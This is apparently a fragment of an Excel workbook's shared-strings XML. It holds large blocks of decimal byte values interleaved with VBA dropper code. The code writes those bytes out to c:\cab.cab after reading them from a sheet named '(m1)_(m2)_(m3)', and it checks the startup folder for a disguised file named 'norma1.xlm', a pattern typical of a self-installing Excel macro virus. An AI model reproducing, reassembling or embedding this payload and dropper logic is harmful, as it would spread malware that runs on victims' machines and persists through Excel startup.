    <t xml:space="preserve">74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 131 4 34 171 230 217 59 142 67 68 49 207 42 34 70 189 134 28 166 21 20 123 71 255 156 186 128 55 124 129 4 198 64 8 226 69 131 156 125 152 184 42 45 203 221 31 206 70 253 135 200 12 228 148 248 49 162 117 135 72 24 38 225 234 230 16 27 80 141 112 138 183 95 55 193 133 230 225 205 224 13 235 92 71 15 251 193 34 81 62 153 81 217 217 74 220 9 153 240 154 83 45 16 129 127 231 58 253 214 54 50 217 139 126 111 42 2 98 13 69 64 236 40 113 231 16 33 100 70 201 209 149 132 243 206 246 137 56 96 182 125 0 14 241 63 193 93 68 214 156 34 44 72 214 145 38 56 151 104 25 36 36 50 79 146 145 6 161 231 128 189 227 18 176 213 227 177 71 53 2 33 253 35 249 69 143 96 239 56 75 148 100 3 39 94 85 103 129 127 6 124 50 161 236 228 41 241 75 222 210 244 10 111 248 245 69 237 87 247 192 105 18 215 126 181 27 160 156 87 131 127 184 200 72 139 228 236 0 174 36 156 146 56 198 209 65 105 71 38 217 137 85 208 234 44 180 161 112 61 4 196 13 236 126 33 232 175 193 212 149 140 95 227 53 151 114 89 151 10 80 31 122 143 48 122 126 146 209 24 59 168 89 15 111 105 5 11 243 176 78 201 22 178 132 168 26 124 52 219 212 108 31 215 85 197 117 114 154 3 242 71 47 215 72 182 252 113 122 114 203 213 97 190 81 202 34 145 75 179 67 244 55 170 37 141 227 157 64 63 201 220 182 214 247 189 63 173 129 128 130 134 128 170 4 20 230 192 242 134 152 126 247 213 189 156 59 101 63 240 8 88 213 248 0 249 107 164 236 128 194 70 249 152 81 38 184 150 </t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t xml:space="preserve">165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 139 208 159 131 254 52 244 131 132 254 178 39 63 85 203 158 250 20 32 6 136 1 94 4 120 17 32 20 31 79 141 2 28 3 56 6 48 5 48 5 48 13 48 29 99 99 198 159 105 71 153 212 164 36 116 194 240 40 244 52 116 97 33 140 120 185 134 198 163 125 221 132 186 233 207 38 231 153 17 160 241 58 105 128 40 38 113 99 210 109 233 88 219 234 116 70 254 226 148 252 109 87 46 189 148 134 115 247 56 201 185 227 191 6 41 59 157 6 191 147 247 49 97 222 71 49 185 143 71 22 26 247 65 144 187 59 225 185 7 250 41 232 93 62 230 150 161 206 114 102 3 108 188 145 108 251 211 105 219 18 186 50 243 83 119 244 133 69 249 210 144 254 193 105 152 221 211 240 0 105 234 174 190 96 148 47 9 185 246 3 247 64 88 185 126 111 17 192 50 232 37 208 75 161 151 65 175 132 190 25 250 3 78 227 94 160 240 123 170 8 96 33 192 66 128 14 128 14 128 2 64 1 32 15 144 7 200 1 228 0 178 0 217 235 239 197 148 79 4 126 59 161 255 0 250 171 206 105 247 226 99 128 234 105 247 96 188 95 127 7 211 199 174 187 55 125 229 197 125 30 202 72 128 137 192 73 86 209 38 178 231 246 45 50 210 137 34 179 80 146 11 86 151 137 156 36 24 99 63 188 201 28 251 208 21 55 99 175 123 37 39 121 168 125 144 225 223 87 96 78 21 65 189 197 132 232 6 165 223 174 92 24 13 76 37 25 78 35 201 152 138 216 246 142 35 25 31 246 54 129 22 41 215 48 238 145 127 133 55 158 158 116 85 80 186 189 189 128 68 0 43 184 11 53 75 223 91 8 49 158 228 150 7 141 50 146 87 141 60 251 33 </t>
  </si>
  <si>
    <t xml:space="preserve">226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1 253 224 247 193 41 66 240 207 164 1 25 223 200 244 119 249 217 100 47 164 2 255 76 138 230 157 41 10 234 14 37 44 80 232 164 244 64 178 215 34 223 151 236 173 144 22 116 121 172 165 185 82 129 94 37 128 5 50 177 141 244 128 55 69 10 157 254 178 21 214 92 51 112 67 192 150 133 106 35 104 139 102 222 114 135 25 68 67 214 58 119 66 206 159 10 132 170 205 136 201 107 201 129 169 93 70 206 177 18 158 253 184 142 228 142 35 183 18 122 25 84 59 70 215 166 98 149 43 88 35 87 129 204 35 69 84 225 180 148 19 249 78 174 204 242 172 102 17 47 119 130 18 129 183 77 169 94 129 25 116 39 212 170 148 93 121 207 72 80 132 46 170 20 226 51 185 198 82 155 148 215 153 93 174 123 133 17 82 127 175 95 13 249 73 33 96 120 34 171 114 229 44 197 43 88 180 134 254 108 91 57 108 162 181 154 188 0 110 204 171 135 232 201 44 68 188 46 91 132 167 114 37 60 70 73 235 204 124 160 66 186 161 203 171 131 124 110 132 109 80 94 121 103 217 109 86 109 169 59 204 203 121 145 176 158 43 91 251 179 115 181 194 16 29 210 73 42 81 109 124 156 224 201 140 196 146 115 129 126 32 201 126 160 28 108 91 19 64 186 18 240 156 213 227 1 38 45 157 89 197 97 30 114 51 200 115 254 82 70 241 166 145 16 72 22 253 84 179 3 66 105 51 7 63 248 4 96 52 179 228 149 34 175 239 80 153 82 6 74 12 163 144 201 55 117 151 12 208 198 0 155 25 8 134 232 198 213 107 134 225 16 121 54 177 75 61 127 217 54 82 77 228 47 1 0 198 201 83 53 232 94 209 161 174 249 0 80 </t>
  </si>
  <si>
    <t xml:space="preserve">58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 240 227 15 11 205 130 65 230 167 100 169 109 132 243 10 13 209 20 1 171 43 72 85 48 12 249 196 215 178 239 28 63 126 163 128 120 2 39 202 38 101 194 149 24 40 0 234 251 179 151 115 205 34 161 158 231 92 103 209 62 97 117 35 171 202 99 97 70 109 100 67 116 77 0 175 51 235 73 119 31 228 211 109 91 81 144 111 26 239 229 104 153 43 46 103 71 230 16 83 200 70 27 57 52 92 252 235 100 47 163 214 167 164 165 232 12 250 48 241 7 171 242 201 66 228 120 198 172 27 126 195 70 164 37 104 200 125 170 117 81 228 142 92 153 209 189 169 59 181 175 146 189 17 121 206 117 149 238 8 201 222 149 112 154 146 57 208 168 145 55 224 45 89 206 131 241 147 226 21 5 217 232 105 153 187 185 54 53 242 15 240 90 156 96 122 201 119 153 254 63 85 121 101 193 129 33 146 71 233 242 24 126 252 170 201 129 55 45 47 64 229 28 212 32 196 24 91 243 136 125 1 41 156 7 72 41 183 57 181 18 130 158 38 43 170 96 133 145 249 194 50 200 215 247 217 208 70 195 223 89 193 223 73 12 42 47 36 7 27 199 192 43 249 194 226 229 150 122 211 64 50 148 21 76 194 208 121 242 149 164 26 28 221 202 49 136 30 228 99 137 235 44 72 71 173 79 119 101 151 110 151 230 149 182 72 246 210 125 246 232 34 144 224 91 52 4 22 141 124 0 56 65 107 220 91 57 196 0 79 88 66 244 61 93 229 116 249 29 125 246 142 79 128 93 247 47 205 180 213 254 139 184 146 218 252 120 139 180 77 193 197 146 87 193 115 165 219 21 60 75 42 170 176 71 95 37 101 70 125 218 30 61 4 15 3 222 52 241 128 202 81 </t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t xml:space="preserve">167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 122 100 46 60 71 142 71 70 102 3 108 126 17 144 12 39 13 110 232 187 55 194 141 15 130 67 112 191 23 102 161 188 157 135 188 14 221 122 16 116 69 221 195 171 91 88 181 80 221 194 169 91 138 212 10 243 27 14 202 39 5 8 84 231 174 207 93 73 87 220 253 31 193 253 245 104 129 241 165 240 50 178 187 143 75 249 201 117 188 34 229 122 148 1 214 221 219 118 81 251 14 42 81 52 17 165 66 206 196 103 22 92 144 130 50 5 217 204 250 196 110 126 97 44 205 118 95 145 10 209 184 251 191 129 223 13 130 174 238 102 213 221 188 186 155 83 151 171 187 139 80 191 81 92 147 162 131 208 75 34 4 68 118 123 135 147 216 196 22 46 122 214 222 145 79 110 242 178 85 230 149 109 28 56 177 45 35 54 99 0 244 57 73 244 217 246 91 194 77 21 40 36 175 26 207 168 130 37 89 84 116 208 152 173 104 37 21 83 37 252 50 67 1 247 177 112 126 172 100 125 241 80 172 228 39 195 80 54 41 183 82 202 255 180 247 53 80 81 92 89 194 213 116 129 5 52 118 43 16 209 104 210 70 204 196 33 49 196 246 7 166 197 116 11 173 128 160 141 45 221 33 138 74 164 13 116 16 152 166 74 193 129 164 73 193 124 20 149 90 157 196 179 155 61 51 155 9 209 153 117 146 239 59 155 179 153 207 207 153 100 147 198 206 128 154 108 98 116 39 58 154 47 226 140 187 83 78 185 9 70 3 173 33 212 119 239 171 106 108 147 56 51 187 103 206 126 231 236 225 157 243 120 127 247 189 119 223 223 125 247 222 119 139 30 48 149 114 163 34 37 46 217 0 48 5 176 188 97 36 24 152 224 113 1 155 11 246 198 101 117 98 </t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t xml:space="preserve">86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 89 50 73 152 11 39 24 178 88 32 123 17 143 237 92 254 156 131 132 182 114 137 242 124 224 132 196 37 168 121 178 169 189 73 223 137 176 211 151 23 176 134 213 94 249 159 81 111 37 177 73 6 69 150 232 127 194 219 196 45 223 53 162 170 226 112 149 253 170 176 4 245 82 32 178 38 203 125 255 142 123 161 0 91 200 187 155 205 175 244 201 207 101 225 67 85 149 43 244 112 1 123 79 165 124 233 115 85 181 71 170 132 36 2 30 68 112 159 186 84 70 243 207 42 32 248 85 198 47 243 238 230 142 85 171 4 9 249 135 88 46 204 193 184 112 215 150 205 131 137 7 0 83 60 14 27 117 34 113 11 246 143 3 71 249 230 16 192 214 209 0 227 245 168 153 121 48 79 125 168 82 19 150 28 197 77 50 158 151 197 38 136 81 201 21 117 75 174 49 183 199 227 147 203 9 79 129 212 71 162 123 220 114 201 231 56 40 254 237 44 251 85 192 144 145 79 92 6 12 98 240 162 11 128 190 239 246 250 228 25 164 214 24 255 118 70 177 64 52 113 91 54 239 71 85 156 70 189 196 114 96 66 50 60 94 126 46 37 114 22 164 96 131 4 107 88 200 110 149 101 132 101 112 144 132 14 83 40 239 30 174 168 215 109 112 132 110 220 195 46 232 58 201 206 55 31 58 57 242 116 77 155 131 162 89 147 106 232 30 97 147 122 45 61 119 172 114 144 248 175 73 92 121 143 36 232 208 189 212 42 108 96 149 67 41 36 57 137 164 184 215 226 48 31 58 59 194 199 55 146 216 155 213 115 215 42 232 197 202 38 119 33 151 117 35 153 123 183 235 36 103 44 86 24 210 212 118 21 216 195 44 42 148 71 153 187 134 0 207 </t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103 118 33 0 206 140 27 98 146 54 63 218 220 152 227 38 208 8 185 170 193 113 233 17 32 143 177 9 83 13 151 102 96 82 101 141 252 183 96 57 50 128 254 169 84 117 164 162 162 239 226 46 36 129 226 3 101 91 113 55 217 206 1 37 132 141 202 217 212 95 139 195 246 171 44 28 95 132 192 209 42 247 169 153 197 200 67 68 237 95 152 187 254 128 87 3 41 195 39 151 75 248 34 202 71 13 230 110 36 26 176 135 76 90 125 115 215 17 124 128 203 191 75 28 96 167 58 28 219 243 179 184 235 90 240 89 206 128 88 80 4 205 125 16 245 120 28 30 143 219 235 241 8 69 217 139 213 211 162 108 87 216 69 149 242 161 207 180 35 83 148 109 97 231 121 60 149 168 198 206 6 40 245 52 112 171 83 137 46 187 229 15 120 78 54 101 91 128 121 179 120 213 76 7 162 23 81 60 124 52 129 43 179 127 129 36 35 134 49 187 60 239 110 113 16 136 121 94 22 247 5 254 25 201 25 116 136 114 165 188 238 51 253 56 115 180 109 68 73 173 244 121 229 41 159 146 219 223 167 102 46 199 218 3 200 40 33 229 70 65 238 114 17 170 115 235 112 70 228 12 173 42 8 102 76 224 78 249 239 46 33 50 75 144 165 24 36 108 155 21 181 136 223 71 72 251 112 203 172 16 10 52 83 213 129 85 137 41 125 8 195 15 48 137 88 166 252 86 130 17 2 127 182 9 250 218 14 188 232 74 216 117 191 210 94 167 139 186 195 230 174 95 96 60 87 170 163 15 83 12 54 37 205 94 216 158 32 14 231 19 89 168 99 253 91 7 118 35 63 140 248 116 93 33 143 65 108 30 175 245 47 76 145 122 72 247 253 45 89 161 </t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t xml:space="preserve">173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 44 20 175 170 236 12 223 68 55 38 162 158 18 86 224 130 38 133 214 210 14 197 204 71 141 112 56 214 210 140 66 195 223 80 33 255 133 177 253 135 42 65 92 205 116 35 83 77 158 63 139 34 182 112 128 66 17 187 14 153 18 243 190 48 244 81 75 90 221 143 114 51 155 41 179 70 242 64 98 142 9 210 91 241 89 35 28 129 91 55 242 46 81 12 250 42 81 178 168 123 49 23 74 225 190 62 49 151 162 170 225 228 136 255 10 87 80 89 54 61 234 164 147 0 187 195 120 56 88 51 44 23 3 23 147 69 72 56 140 66 63 190 65 138 184 176 129 241 186 131 208 64 173 186 4 149 15 250 99 10 148 88 225 198 23 155 77 252 184 202 46 4 1 32 155 189 79 90 188 83 52 189 38 148 129 140 80 108 226 219 95 163 41 110 122 157 1 121 131 162 215 24 25 63 35 80 55 188 198 40 145 218 61 137 148 38 215 32 55 110 11 215 138 105 152 238 108 163 177 35 206 34 86 152 196 245 166 252 10 134 75 36 184 69 60 21 175 215 194 101 169 164 232 17 96 103 133 53 140 80 72 11 79 152 170 54 30 161 169 119 223 245 22 46 202 125 164 48 55 151 240 246 12 14 125 76 172 54 1 225 30 117 144 65 154 187 241 82 23 224 194 112 161 150 28 110 6 161 112 76 108 49 137 223 99 112 4 53 146 105 39 223 190 135 166 88 151 183 82 122 194 162 110 216 67 87 111 134 22 82 195 172 173 117 57 64 121 228 159 17 158 154 134 82 175 71 254 152 36 24 168 22 48 136 69 123 24 185 6 31 215 232 61 66 161 9 234 50 80 1 138 196 197 123 148 62 242 5 136 50 155 140 68 201 196 198 3 170 71 </t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
    <t xml:space="preserve">126 65 171 95 77 178 99 139 82 9 171 194 136 11 68 231 108 183 232 204 114 203 109 58 16 140 176 15 95 117 128 64 177 105 176 226 223 230 11 138 65 50 51 112 115 235 198 208 208 1 174 106 170 79 6 82 86 165 75 156 184 233 244 167 100 242 14 129 92 166 88 201 216 142 29 110 133 233 179 91 216 84 56 65 206 2 84 209 180 95 241 138 87 64 132 176 255 53 22 153 187 103 3 104 172 51 115 151 76 116 61 92 154 222 161 185 235 52 46 212 13 236 213 220 117 133 188 50 108 2 36 201 197 237 6 89 130 220 220 80 33 93 207 223 183 13 164 84 217 103 70 9 82 203 242 185 165 127 194 80 94 4 187 218 81 197 71 151 239 92 160 149 184 229 187 81 165 18 213 82 188 108 15 24 141 209 186 189 208 130 79 254 60 131 72 202 82 247 86 100 154 89 210 170 193 140 221 99 134 207 45 211 19 137 186 102 82 122 117 42 108 183 67 237 48 38 45 219 45 95 128 156 58 11 240 170 58 92 49 129 75 34 45 223 191 69 185 87 114 49 18 169 128 218 134 165 242 179 102 242 226 179 52 112 77 59 219 110 237 81 98 243 177 72 157 3 70 123 171 254 10 14 101 59 36 56 67 132 159 207 66 132 226 231 183 98 16 48 236 111 38 244 180 14 254 226 167 31 143 68 250 176 64 50 133 250 218 73 216 3 196 45 3 25 194 28 183 169 243 6 126 31 18 156 194 135 51 20 25 78 50 217 204 25 98 165 9 223 144 188 162 211 34 126 150 243 93 147 248 232 24 127 100 204 215 255 137 89 124 79 220 61 86 127 140 134 149 94 35 116 140 73 207 24 138 0 51 161 250 154 80 62 44 154 210 129 238 9 229 81 238 169 254 235 116 224 225 146 45 66 185 201 254 254 78 35 242 0 101 233 180 189 44 157 225 138 129 15 231 175 91 91 102 163 38 34 116 234 83 169 204 64 143 158 158 219 254 106 209 120 50 151 3 189 206 205 87 178 249 254 33 189 24 160 117 136 55 94 69 29 29 0 37 33 80 27 13 45 50 98 123 58 45 144 40 13 81 198 8 162 95 27 3 200 136 95 244 171 244 58 94 125 120 167 49 240 240 22 96 216 248 11 </t>
  </si>
  <si>
    <r>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">128 215 101 115 247 139 40 210 194 57 45 31 35 24 10 149 209 146 71 237 199 1 205 157 137 2 140 249 184 177 122 76 252 2 26 192 234 246 27 59 19 196 27 246 247 217 39 196 242 168 88 65 219 43 226 176 255 37 65 239 15 4 183 147 115 55 220 196 126 26 193 94 47 142 97 127 114 238 190 91 176 175 160 73 147 140 88 66 11 165 90 156 22 75 24 161 148 17 43 163 124 199 101 138 75 206 239 48 153 187 4 164 123 229 195 146 233 122 12 18 227 0 38 0 124 41 45 64 11 165 180 189 148 225 182 245 150 77 161 121 213 218 83 110 30 239 239 129 120 203 252 80 135 153 226 166 190 142 136 136 239 159 82 160 219 228 153 19 41 169 232 213 162 228 44 101 1 1 178 72 235 134 72 137 6 85 69 67 58 182 58 93 4 239 228 60 17 38 213 53 44 204 18 54 165 143 169 32 60 221 192 243 143 219 14 175 219 243 68 146 106 64 125 98 65 221 86 124 208 54 27 139 77 175 83 32 225 214 161 44 234 169 0 22 133 148 147 42 250 228 36 187 25 146 212 107 58 44 252 129 30 236 76 3 130 244 120 113 161 22 45 182 132 218 10 97 78 248 173 244 56 201 225 91 25 149 107 240 192 129 104 54 169 167 73 150 218 108 185 245 17 153 108 122 49 147 108 121 58 212 63 148 32 30 37 128 57 71 165 178 105 151 43 164 226 140 10 183 108 153 78 88 109 184 23 212 52 132 183 39 34 200 78 35 47 103 136 105 88 85 72 195 195 164 160 90 123 63 22 9 75 16 217 152 238 1 142 74 92 55 30 47 116 228 147 150 63 173 25 180 72 197 51 248 11 195 112 46 96 171 149 192 166 233 152 202 191 167 158 250 132 47 143 170 2 119 77 177 192 54 1 49 205 54 114 74 134 36 92 19 125 216 147 120 198 126 94 168 102 90 102 138 107 104 209 62 175 60 58 111 60 245 125 46 149 143 100 216 171 199 160 32 248 123 8 185 54 241 172 253 12 130 101 222 2 150 8 96 202 191 217 207 112 85 0 212 50 141 255 30 3 162 22 228 1 164 242 239 88 239 222 88 189 52 82 70 224 63 1 248 169 114 30 218 71 157 233 62 7 133 108 134 </t>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t xml:space="preserve">71 62 139 22 41 226 26 139 96 16 11 45 124 158 74 212 179 102 200 20 230 16 44 11 45 162 133 191 161 10 149 99 108 134 248 204 94 92 54 177 125 111 81 12 145 101 162 150 213 92 52 175 50 58 143 187 134 166 11 82 113 81 234 135 34 119 141 155 33 254 0 101 98 213 53 6 133 124 63 45 142 207 203 79 61 205 94 18 225 92 30 183 169 26 113 137 17 150 242 107 98 25 180 251 30 151 166 119 19 176 66 39 91 186 143 181 39 126 112 97 181 50 42 2 192 134 235 180 152 146 3 244 231 10 208 158 254 113 122 45 63 254 240 147 112 240 55 219 71 205 93 168 12 208 15 73 13 28 144 142 156 184 19 49 38 181 231 209 163 167 132 234 203 243 54 245 20 9 224 199 205 92 30 218 218 148 95 158 155 170 60 20 127 46 8 172 244 12 217 161 163 167 230 206 28 55 67 53 46 85 7 94 67 195 22 129 40 28 224 221 52 223 17 165 144 42 193 121 221 205 0 65 50 119 237 35 231 248 154 216 126 133 150 76 87 132 221 244 55 28 225 218 222 178 36 154 31 135 35 156 218 177 96 188 63 212 145 74 245 64 14 151 74 142 162 248 222 169 79 147 237 19 81 192 39 185 189 167 72 121 48 14 48 77 90 27 59 182 201 223 163 17 227 55 8 182 144 253 38 201 254 36 121 25 144 26 52 130 18 82 132 178 105 99 104 36 20 21 185 97 227 7 210 90 3 102 45 26 131 245 17 167 118 31 147 218 12 194 10 110 150 125 14 110 121 110 58 180 101 39 135 148 155 162 223 53 144 35 48 210 74 90 83 60 147 35 144 134 247 13 136 67 170 189 159 203 149 138 4 55 218 147 170 75 240 96 248 98 231 146 133 115 105 31 100 107 120 237 114 34 23 152 94 27 163 117 111 59 97 129 25 56 69 90 5 105 113 167 118 215 217 7 133 85 22 246 219 1 186 14 37 132 58 188 178 128 225 109 214 75 76 28 90 248 248 226 15 191 45 172 204 224 215 50 170 176 66 120 146 86 19 73 23 171 44 192 204 163 62 137 40 4 200 253 230 19 191 107 17 157 140 237 92 119 24 246 211 16 8 165 98 36 240 112 125 24 119 224 163 82 87 46 </t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">217 130 174 49 193 193 8 14 26 248 151 82 152 158 47 2 116 255 239 205 198 54 19 97 146 235 144 200 233 184 160 145 6 170 87 159 195 73 255 27 252 228 210 126 99 215 114 105 181 133 47 142 170 124 207 101 184 221 85 169 103 12 130 65 199 216 48 4 48 133 61 99 32 56 9 197 244 96 72 134 12 204 76 196 102 165 226 97 251 241 157 131 168 69 88 103 74 68 181 94 192 176 5 192 4 39 35 149 154 132 98 70 112 210 124 237 11 69 148 240 198 11 184 198 189 171 10 123 143 142 247 119 133 129 244 244 172 45 228 140 201 173 52 33 179 226 59 167 254 0 215 143 155 17 35 154 2 15 152 112 219 73 237 237 229 176 5 152 49 59 195 90 97 100 43 11 90 57 228 204 248 235 233 193 57 252 245 236 93 89 154 202 24 217 228 136 72 255 58 3 64 247 99 70 164 243 58 190 145 5 167 119 94 63 78 197 52 221 12 126 190 154 114 83 201 140 156 60 255 142 106 3 234 246 11 242 204 100 0 46 113 153 180 151 72 86 71 90 102 143 56 104 52 209 9 51 202 21 88 147 28 67 127 212 104 28 208 20 237 27 128 34 172 230 7 172 157 215 137 132 245 43 165 240 77 172 229 149 207 254 78 147 212 108 186 164 38 153 180 135 52 210 168 96 128 102 51 226 5 182 105 208 186 241 67 69 238 255 125 162 120 94 179 117 196 231 1 175 246 60 224 107 89 255 205 175 3 252 242 135 84 110 169 206 123 146 7 14 238 46 94 166 88 75 49 203 20 115 233 158 192 53 133 241 4 62 87 140 158 192 136 154 217 138 2 216 20 97 118 174 45 188 241 118 202 127 50 229 94 205 28 199 215 82 25 103 137 179 124 66 151 62 133 216 213 24 216 101 64 106 217 69 49 86 251 110 91 56 231 40 107 41 97 153 18 46 221 141 61 187 177 103 247 205 158 121 83 174 122 123 163 164 120 59 163 217 226 81 126 232 110 24 239 132 149 81 63 109 144 232 126 214 40 82 145 111 170 174 91 157 250 204 255 192 102 103 240 227 67 226 199 187 210 110 121 78 181 169 144 187 235 219 246 57 228 213 53 205 35 95 142 130 56 18 173 234 86 185 28 111 128 137 </t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t xml:space="preserve">103 85 197 40 100 222 195 23 224 19 47 197 206 244 202 231 117 195 215 12 229 23 112 137 251 228 99 154 113 158 102 28 10 3 138 122 125 1 163 77 221 172 219 162 22 197 217 162 62 56 226 48 241 108 154 91 174 252 23 221 4 213 176 154 31 207 104 159 65 96 212 197 175 202 63 248 141 170 146 68 21 159 253 42 21 51 65 125 3 27 143 104 186 109 114 114 101 225 2 42 32 97 113 186 195 112 172 216 52 190 196 196 12 58 201 35 171 50 13 18 180 228 204 128 2 200 66 177 6 200 4 95 67 195 70 139 155 213 160 17 56 230 175 76 108 47 76 44 63 228 136 244 13 239 34 226 184 25 31 171 213 19 56 90 26 197 228 24 143 61 27 120 67 143 237 156 119 164 63 228 27 116 93 52 161 168 88 45 179 201 112 171 12 184 84 139 146 26 242 171 212 160 235 50 10 107 135 145 200 116 31 229 166 141 252 202 193 49 249 137 76 43 8 227 116 168 92 13 5 140 98 255 230 121 3 57 17 246 129 98 118 110 49 155 121 243 12 10 115 200 251 234 252 4 124 143 184 6 25 97 197 162 69 28 104 73 123 141 80 7 151 133 143 90 216 123 249 168 149 205 226 163 185 108 10 31 117 112 175 11 220 176 146 57 232 26 198 113 163 73 233 48 17 36 141 66 245 240 47 169 41 136 14 77 81 243 142 191 69 78 243 209 167 150 128 48 254 14 251 109 96 148 231 116 94 71 213 22 187 28 66 35 10 192 141 32 244 12 186 162 164 157 101 16 65 109 176 178 80 224 162 202 2 0 1 145 156 157 5 33 8 203 108 178 253 56 59 245 210 10 13 30 101 117 196 49 170 105 66 77 111 226 83 73 247 32 155 46 166 61 15 99 26 253 96 94 121 6 204 27 217 140 7 29 108 74 39 62 114 194 124 140 24 70 222 182 176 9 169 163 7 173 44 67 50 25 37 229 160 133 77 34 113 139 188 29 173 211 206 240 239 171 246 243 92 250 45 155 30 197 89 101 69 128 242 170 92 84 114 93 116 171 220 176 202 93 35 207 126 237 184 129 135 237 163 236 116 111 76 199 194 221 233 213 108 7 181 71 65 183 252 211 27 184 149 6 47 125 72 84 122 168 </t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t xml:space="preserve">119 41 87 29 74 50 234 93 112 153 24 144 222 159 130 190 171 122 93 0 118 85 124 199 100 208 40 79 143 43 53 158 248 132 252 169 197 61 69 15 209 92 235 193 16 203 142 184 76 9 108 99 32 1 101 247 123 126 71 212 107 176 223 5 215 48 55 181 147 152 152 225 251 3 91 174 60 28 242 167 83 146 43 61 96 112 123 100 195 16 1 4 28 239 8 117 164 207 66 227 182 97 143 220 159 18 179 84 158 142 234 25 143 124 242 183 177 246 56 147 71 254 171 15 1 55 124 50 152 137 204 4 108 51 151 137 97 83 197 41 161 178 92 218 170 61 109 146 203 67 179 111 66 195 76 70 9 72 7 200 63 128 16 85 60 66 190 209 126 35 81 233 244 26 156 93 97 214 174 37 185 43 162 225 151 234 248 248 147 198 19 252 176 106 59 2 164 253 103 148 193 208 201 202 162 115 12 192 230 117 93 100 103 253 12 110 69 138 157 138 246 204 42 155 160 252 179 212 166 42 105 82 219 184 194 72 109 95 42 70 169 109 12 58 48 233 237 207 236 157 230 236 58 201 214 246 204 88 173 119 241 137 146 40 204 224 7 105 210 143 104 208 123 2 242 31 235 235 2 192 47 238 26 97 191 53 122 132 244 52 29 67 210 213 160 48 3 53 80 91 34 219 181 200 192 234 4 106 34 177 37 210 163 135 68 111 165 117 159 161 13 207 17 27 30 81 42 253 241 49 46 130 49 102 107 99 76 191 57 70 39 153 181 156 254 136 228 28 159 136 125 57 17 27 211 99 132 82 100 193 101 138 186 180 30 228 100 135 171 236 75 22 195 241 23 56 96 43 3 104 183 121 14 85 198 94 140 157 60 220 3 119 120 126 46 27 228 195 185 112 161 239 196 11 93 114 201 110 216 173 161 173 154 122 165 59 27 121 9 135 45 92 245 214 214 54 200 234 144 13 2 105 